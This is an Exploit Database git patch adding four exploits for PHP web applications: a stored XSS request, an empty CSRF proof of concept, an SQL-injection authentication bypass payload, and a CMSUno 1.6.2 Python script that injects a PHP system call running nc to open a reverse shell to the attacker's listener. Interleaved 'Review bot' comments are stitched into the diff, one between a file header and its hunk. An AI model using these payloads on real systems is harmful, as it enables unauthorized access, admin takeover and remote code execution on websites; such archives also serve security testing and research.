From e9fc264b77b82b9101b80bf3926134c351e23b8a Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 12 Nov 2020 05:01:58 +0000
Subject: [PATCH] DB: 2020-11-12
4 changes to exploits/shellcodes
Customer Support System 1.0 - 'description' Stored XSS in The Admin Panel
Customer Support System 1.0 - Cross-Site Request Forgery
Customer Support System 1.0 - 'username' Authentication Bypass
CMSUno 1.6.2 - 'user' Remote Code Execution (Authenticated)
---
 exploits/php/webapps/49028.txt | 44 ++++++++++++++++++++
 exploits/php/webapps/49029.txt | 30 ++++++++++++++
 exploits/php/webapps/49030.txt | 30 ++++++++++++++
 exploits/php/webapps/49031.txt | 76 ++++++++++++++++++++++++++++++++++
 files_exploits.csv | 4 ++
 5 files changed, 184 insertions(+)
 create mode 100644 exploits/php/webapps/49028.txt
 create mode 100644 exploits/php/webapps/49029.txt
 create mode 100644 exploits/php/webapps/49030.txt
 create mode 100644 exploits/php/webapps/49031.txt
diff --git a/exploits/php/webapps/49028.txt b/exploits/php/webapps/49028.txt
new file mode 100644
index 000000000..d97d9e8ac
--- /dev/null
+++ b/exploits/php/webapps/49028.txt
@@ -0,0 +1,44 @@
+# Exploit Title: Customer Support System 1.0 - 'description' Stored XSS in The Admin Panel
+# Date: 2020-11-11
+# Exploit Author: Ahmed Abbas
+# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
+
+
+Stored XSS Reproduction Steps:
+1. Navigate to http://TARGET/customer_support/index.php?page=department_list
+2. Click on new Department
+3. Add the XSS payload into the "description" parameter value
+4. Browse to the post to trigger the XSS payload
+
+# POC
+
+POST /customer_support/ajax.php?action=save_department HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------196034062430192961002574272606
+Content-Length: 445
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/customer_support/index.php?page=department_list
+Cookie: PHPSESSID=6dbp44u1fs8f0ndfqutpn3lbuq
+
+-----------------------------196034062430192961002574272606
+Content-Disposition: form-data; name="id"
+
+4
+-----------------------------196034062430192961002574272606
+Content-Disposition: form-data; name="name"
+
+Stored xss
+-----------------------------196034062430192961002574272606
+Content-Disposition: form-data; name="description"
+
+
+-----------------------------196034062430192961002574272606--
\ No newline at end of file
diff --git a/exploits/php/webapps/49029.txt b/exploits/php/webapps/49029.txt
new file mode 100644
index 000000000..6a972498a
--- /dev/null
+++ b/exploits/php/webapps/49029.txt
@@ -0,0 +1,30 @@
+# Exploit Title: Customer Support System 1.0 - Cross-Site Request Forgery (Admin Account Takeover)
+# Date: 2020-11-11
+# Exploit Author: Ahmed Abbas
+# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
+
+
+# Description : Admin Account Takeover
+# Vulnerability Details
+ [+] The username and password parameters can be forged to force the password change of admin user account.
+
+# POC - CSRF HTML
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/49030.txt b/exploits/php/webapps/49030.txt
new file mode 100644
index 000000000..11ffbeb05
--- /dev/null
+++ b/exploits/php/webapps/49030.txt
@@ -0,0 +1,30 @@
+# Title: Customer Support System 1.0 - 'username' Authentication Bypass
+# Date: 2020-11-11
+# Exploit Author: Ahmed Abbas
+# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
+
+
+# Description : Authentication Bypass
+# Vulnerability Details:
+[+] A SQL injection vulnerability in Customer Support System 1.0 allows remote unauthenticated attackers to bypass the authentication process via username and password parameters.
+
+
+# Malicious POST Request to https://TARGET
+POST /customer_support/ajax.php?action=login HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 62
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/customer_support/login.php
+Cookie: PHPSESSID=gbattc1r1riap25kr5k2k1ureo
+
+username=' or 1=1 or ''='&password=password&type=1
\ No newline at end of file
diff --git a/exploits/php/webapps/49031.txt b/exploits/php/webapps/49031.txt
new file mode 100644
index 000000000..901ea6c33
--- /dev/null
+++ b/exploits/php/webapps/49031.txt
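Review bot: The header of 49030.txt uses `# Title:` where the other three files in this commit use `# Exploit Title:`, so the first line should read `# Exploit Title: Customer Support System 1.0 - 'username' Authentication Bypass` to keep the header fields uniform across the set. The heading `# Malicious POST Request to https://TARGET` also disagrees with the request printed under it, which is plain HTTP against `Host: localhost`; one of the two should be adjusted so the scheme and host agree. The vulnerability details name the class (SQL injection through the username and password parameters of the login handler) but no remediation; a one-line note that the login query in `ajax.php?action=login` needs to be parameterized, presumably the fix given the stated class, would make the advisory useful to the vendor as well as to testers.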
@@ -0,0 +1,76 @@
+# Exploit Title: CMSUno 1.6.2 - 'user' Remote Code Execution (Authenticated)
+# Google Dork: N/A
+# Date: 2020.09.30
+# Exploit Author: Fatih Çelik
+# Vendor Homepage: https://github.com/boiteasite/cmsuno/
+# Software Link: https://github.com/boiteasite/cmsuno/
+# Blog: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution.html
+# Version: 1.6.2
+# Tested on: Kali Linux 2020.2
+# CVE : N/A
+
+import requests
+from bs4 import BeautifulSoup
+import lxml
+import json
+from time import sleep
+
+username = input("username: ")
+password = input("password: ")
+root_url = input("Root URL: http://192.168.1.9/cmsuno --> ")
+listener_ip = input("Your ip: ")
+listener_port = input("Your port for reverse shell: ")
+
+login_url = root_url + "/uno.php"
+vulnerable_url = root_url + "/uno/central.php"
+
+session = requests.Session()
+request = session.get(login_url)
+
+# Get the unox value
+soup = BeautifulSoup(request.text,"lxml")
+unox = soup.find("input",{'name':'unox'})['value']
+
+# Login
+
+body = {"unox":unox,"user":username,"pass":password}
+session.post(login_url, data=body)
+
+# Get the second unox value
+
+request = session.get(login_url)
+text = request.text
+soup = BeautifulSoup(text,"lxml")
+script = soup.findAll('script')[1].string
+data = script.split("Unox='")[1]
+unox = data.split("',")[0]
+
+# Exploit
+
+header = {
+"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
+"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0",
+"Accept":"*/",
+"Accept-Encoding": "gzip, deflate",
+"X-Requested-With": "XMLHttpRequest",
+"Origin": login_url,
+"Referer": login_url
+}
+
+payload = 'en";system(\'nc.traditional {} {} -e /bin/bash\');?>// '.format(listener_ip,listener_port)
+body = 'action=sauvePass&unox={}&user0={}&pass0={}&user={}&pass=654321&lang=en'.format(unox,username,password,payload)
+session.post(vulnerable_url, data=(json.dumps(body)).replace("\\","")[1:-1],headers=header)
+
+# Login to trigger password.php
+
+# Get the unox value
+session1 = requests.Session()
+request1 = session1.get(login_url)
+soup = BeautifulSoup(request1.text,"lxml")
+unox = soup.find("input",{'name':'unox'})['value']
+
+
+# Login
+sleep(3)
+body = {"unox":unox,"user":username,"pass":password}
+session1.post(login_url, data=body)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index e51359df6..10d1379ec 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -40845,6 +40845,10 @@ id,file,description,date,author,type,platform,port
 49025,exploits/php/webapps/49025.py,"Car Rental Management System 1.0 - SQL injection + Arbitrary File Upload",2020-11-10,"Fortunato Lodari",webapps,php,
 49026,exploits/php/webapps/49026.txt,"ShoreTel Conferencing 19.46.1802.0 - Reflected Cross-Site Scripting",2020-11-10,"Joe Helle",webapps,php,
 49027,exploits/php/webapps/49027.txt,"Anuko Time Tracker 1.19.23.5325 - CSV/Formula Injection",2020-11-10,"Mufaddal Masalawala",webapps,php,
+49028,exploits/php/webapps/49028.txt,"Customer Support System 1.0 - 'description' Stored XSS in The Admin Panel",2020-11-11,"Ahmed Abbas",webapps,php,
+49029,exploits/php/webapps/49029.txt,"Customer Support System 1.0 - Cross-Site Request Forgery",2020-11-11,"Ahmed Abbas",webapps,php,
+49030,exploits/php/webapps/49030.txt,"Customer Support System 1.0 - 'username' Authentication Bypass",2020-11-11,"Ahmed Abbas",webapps,php,
+49031,exploits/php/webapps/49031.txt,"CMSUno 1.6.2 - 'user' Remote Code Execution (Authenticated)",2020-11-11,"Fatih Çelik",webapps,php,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,
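Review bot: `import lxml` in the import block of 49031.txt is never referenced; BeautifulSoup selects that parser through the string argument `"lxml"`, so the statement can be dropped without changing behaviour (the package still has to be installed for the parser to load). The header block carries no description field, so the only statement of the root cause anywhere in the file is the comment `# Login to trigger password.php` in the second half of the script; a `# Description:` line in the header saying which submitted value (presumably `user`, going by the title) is written into `password.php` without sanitisation, and that it executes on the next login, would document the bug that the title only names. Both the `sauvePass` POST and the login POST discard their responses, so the script gives no indication of whether either step was accepted; noted as a readability point only, since the server's response format is not visible here.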